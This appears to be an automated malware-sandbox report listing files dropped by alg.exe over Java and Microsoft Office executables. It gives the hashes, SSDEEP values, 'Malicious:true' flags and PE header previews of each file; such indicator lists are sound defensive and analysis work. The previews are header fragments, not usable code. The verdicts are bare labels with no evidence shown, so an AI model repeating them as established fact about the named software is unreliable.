                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AF23AF073F9AAFCA9E17BE938171D384C44DC3C669F927C5BAF63393D177834D562737AD83258AB4669826A1959C8C046112F3523CBA7BBC9DCC0B151EC2B2EF
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................4.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032984518590752
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:hV/xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C8BD0E3CB056A8166769B6D81C1C1EE4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5E34606699C56821A2F48EB86CCF46E62E4CAF6C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9F602DA4B129A1F291DF7EB81894BC1B8CB736A1BEE3FEC6931C6C628EE66662
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFF8991038E54841421117F24429B3B13515C2B497C56E4DA139A9B672A72B789CBFDE92357D71817F63C707DFF637A4F8EF1E609A35A0B97C8A95A51A489706
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.03289009472779
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:CZmBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6MsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C6B8E38A99B8256BD0952CC43DF94D35
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:03E2AD1C22CABCC9576C889A1A829E8C9F9AE8E3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D217AAF752F159E21AA4E749B99345D8EC4B1944945688410F549BE4309B8BB7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:14CD9C87C3C28DD6D299AE9E2A2655B829AD4B7E0D323BD2B4B37713C833CD9919C37CAFBA4DEAE9FC525E141AA21EF09C85DCEF3C21CE2ED30FFFBEA8B61486
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................. .......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032929133103943
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:jeS5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aQsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:756104B584721E56D7E41BD7A85E1BEF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:12983C277539BD3ADC3E50E501D98FC2EFD26EE4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4EBCEA365E40DDBF6DD70EF3F86A6B072C716ECBFFC0DBCA248A0411C3E3114C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4A3609F240B8C4B07365103E14DC4DB02B739E93EF0A93D52AEB01C649E6AA184F0B7E52AC6B721D519CB588DE0C100006DFFCD3678A2D26B80AA34D187A317B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032995298829421
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:e5/xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:apsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:305FC54E670FA95D83B364D9CC4A4F00
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D6E54236F61C2D342C1EE8BECC3C70A5386162D7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0D535BFB67B996AAEB2EC3D95B27A54E14690A95F098075876DB62DDFFBDC25A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E4B20FAB424D680EFC923D84EAB32F4BCC73B3C27B866C57E01E67FE34F1B1A086AF214D6F9E214DBE8A08CA8B4400C776A3AD970F633A129579AF35B62906EA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1202688
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.098073710010719
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:M7XXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:M7XsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0B93F84030EC8961384920B36FD0C360
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6608D8A110DE6886554416A2550DB34EBD928858
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:34FEF123D6D5BA0B3AEAA3C4B974E32571D3D2346A52A540CA04DB07A651214D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E369FB96075528C758048C0ADF65EBDA13F76C003D4A9FFFCBF05C3067C9DE007727BC6C9E0932A0FB03184A0E4354F58D8D175D374C5EB6850F519B2F2B70E2
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................6...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0323354900631205
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:lKQVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:47922832A05D46FAFA53A6D9BEE0FDF1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CE0875B8441ECC7BA2A16C28D8356439215BFA38
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6833F2446AB374E0AB761639811F7BF00077282B855650C0A2287766947E86B6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4C8D9ECD987310601F82AB5E346CE4725D0CEA3DF9624E3E9B84BD570EEC1051AD41E8E453813BF00B499978DE63DA8A7B51684CDB4EFF834A01DBE84C545C56
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................y.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.24910240867496
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:yi7l/3roADsqjnhMgeiCl7G0nehbGZpbD:Bl/roAHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BFD8F50955253286F828E8A1A9FFE27D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CB523915481CC8D9B67BB2544163C4D557A3F0EE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B143ECC4AFAA47EA937E14066CF1AE5C2E8967A1BD766E32476CA27D35E87021
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FCB3FCA586C57096C1BFAA4ADCF39C66F25C760642926334805849A9B62E2B7E76D2866DDD922D1C31538942B0C2A964448042CD8D143271D2B0C3EF75DC733E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0......7i..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.286664484486176
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:O5bfQnuNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ONfQnusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F92BEDF3A4E028285616F975E614722D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3592FDB8C9ABAEDF76F491B7B3C229D88E991ED1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D0E6DB801CB525682895A457D4D8F88B75EFFD4C1C3613633B0B53397836CA5E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7FF34A24EB9673F8495DCAF9C53DF5D63A74D18A9343977F1DE0129C4CEE4A1D4428D31EBBC9A8B8809C1B477A7B853821A398675104C33FA82A34F2ABAE0AA0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................U.......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.303172224397098
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:JNmt0LDILi21nNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:MLi6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:72B95E5574E6527E85EF3B876CCF65A8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D445446956A76A1754B551A18818A01E19EA97A5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7D8417862591E7A37900FCDEFD03066902DD7BBD251FB45BD783EFDC9980DD30
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6D84030FF84FD3E1AA389AA501F24175ADC97976A795D5F16C317E9756669DE4FFB4B894E37C75277D2ADA3F1A97B9E9AF7B7D80B1A5C0468148A9218E3D09F4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.303174800103875
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+Nmt0LDILi21nNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:dLi6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BA38DA9387C8EE4BCC3268DB7E323722
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4197BA43D7655602929725DDC211E4C1DDAF2336
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AFB3ACC6F2002003ADBE7BC85A56646A7B7E092FBD7E219AE69729CC6A850606
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:23F5B08F861B0722C70F4F5745CD565D26CF9F594C9D9E28BB8CE4A3520BBD423FE692B574228EEA402BFA0228C6C1A07D7A88B6DC2E87EAE99D8FE491E54D96
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................C........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1343488
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235951295046523
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SjuozQMGNUbTGNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:6f6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3E13F01B9E25B29D33D1FB0C2ED8580B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2A0CD0A97BF895841646FEB39B3384975F590CB2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BEC1AA9535D9DF8C412E2F3921DC97079AA339FA050A258DDE68517FF575BFF4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7C7DDA2A9C51367B936EDB709899BEBAF0C09C2989DB2962DC0A15860EAC99F29B3AB77BA68977937938AA2E63896C3BACB2B8B1FFDC412D37EADA78D6F5EAD0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1496064
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.577761850813049
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:dbUO42i/EPsqjnhMgeiCl7G0nehbGZpbD:dJzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:86A76C35F8C54DCAAC23FCD8FB43B07C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C0C9632F4A03528EADC2652C4CF83D4319D1F9B1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D50C13BED0AD7D7B0A17A888FD35363C77A4AE057A5123104D52E7B41B396B43
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5924E2F3F6EF57852B218DC5DA3808791E3F3A272EA1404DA2B3F2973E0F0ADABA2D3EEA0910C1BD92C1AA4A2DF5D87AFD011148BC7409AE26C814DD6E512B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ................... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.961837144598512
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:ELjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:gicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:99874EF78CFDE6337DDCF765A6E7AD2F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1C95DD751436179E026B9A6E26C8AE05FCCC082D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4A9556F5E243DC8A9E53F2D923F5755F9B759A0659E10300B66BA4821AB7A1D0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFB1FA61ACBA86381B4725C8ED09FB97EC2BCDB42DAB3A8476AE9AC91FD80CBCB47BF557F79C046C55E79A0ADF4827B9BF7C7B4D3C3F5227A82EA1F3D07F9081
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
